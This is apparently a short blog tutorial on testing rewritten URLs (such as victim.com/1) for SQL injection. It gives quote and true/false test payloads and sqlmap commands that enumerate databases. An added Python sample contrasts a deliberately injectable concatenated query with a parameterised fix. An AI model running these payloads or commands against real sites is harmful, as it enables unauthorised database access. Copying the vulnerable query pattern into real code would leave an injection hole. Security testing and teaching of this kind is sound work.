SQL Injections in URL Rewrite
First of all, what is URL rewrite?
You've likely seen sites with URLs in this form:
http://victim.com/?id=1
Almost everyone knows how to test for SQL injection in this situation:
http://mysite.com/?id=1' or
http://mysite.com/?id=1 and 2.5=2.5 or
http://mysite.com/?id=1 and 3.4=3.5
and so on.
With URL rewriting, however, this URL
http://victim.com/?id=1
will become
http://victim.com/1
(the id name is hidden and only its value, 1, appears in the URL)
To test for SQL injection in these kinds of URLs, we use the same payloads as before, but place them after the parameter value:
http://victim.com/1' or
http://victim.com/1 and 3.6=3.6
http://victim.com/1 and 3.6=3.77
and so on.
The results would be the same as a normal post parameter.
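Why the rewritten segment behaves like the hidden id parameter, and what the server-side fix looks like, as an added example that is not part of the original post. The rewrite rule, table and function names are assumptions and the sample database is constructed; the test strings are the ones shown above.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed sample data standing in for the site's database.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
db.executemany("INSERT INTO articles VALUES (?, ?)",
               [(1, "first post"), (2, "second post")])

# Hypothetical rewrite rule: /<segment> reaches the app as id=<segment>,
# as a rule of the form "^/(.*)$ -> /?id=$1" would do.
REWRITE = re.compile(r"^/(.*)$")


def rewritten_id(path):
    """Return the value the rewrite rule passes on as the hidden id."""
    match = REWRITE.match(path)
    return unquote(match.group(1)) if match else ""


def lookup_vulnerable(path):
    """Concatenates the path segment into the SQL text (the flawed pattern)."""
    value = rewritten_id(path)
    try:
        return db.execute(
            "SELECT title FROM articles WHERE id = " + value).fetchall()
    except sqlite3.Error:
        return "error"  # a stray quote surfaces as a database error


def lookup_hardened(path):
    """Accepts only a decimal id and binds it as a query parameter."""
    value = rewritten_id(path)
    if not re.fullmatch(r"[0-9]{1,10}", value):
        return "rejected"  # the application would answer 404 here
    return db.execute(
        "SELECT title FROM articles WHERE id = ?", (int(value),)).fetchall()
```

The vulnerable lookup answers differently for the true and false conditions and errors on the quote, which is the signal the manual tests look for; the hardened lookup rejects all three before any SQL is built.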
To test for SQL injection with sqlmap, we mark the injection point with a star. For instance:
sqlmap -u "http://victim.com/1*" --random-agent --level 5 --risk 3 --dbs
or
sqlmap -u "http://victim.com/content*/1" --random-agent --level 5 --risk 3 --dbs
to inject into the content segment. The star shows sqlmap where to inject payloads.
Happy Hacking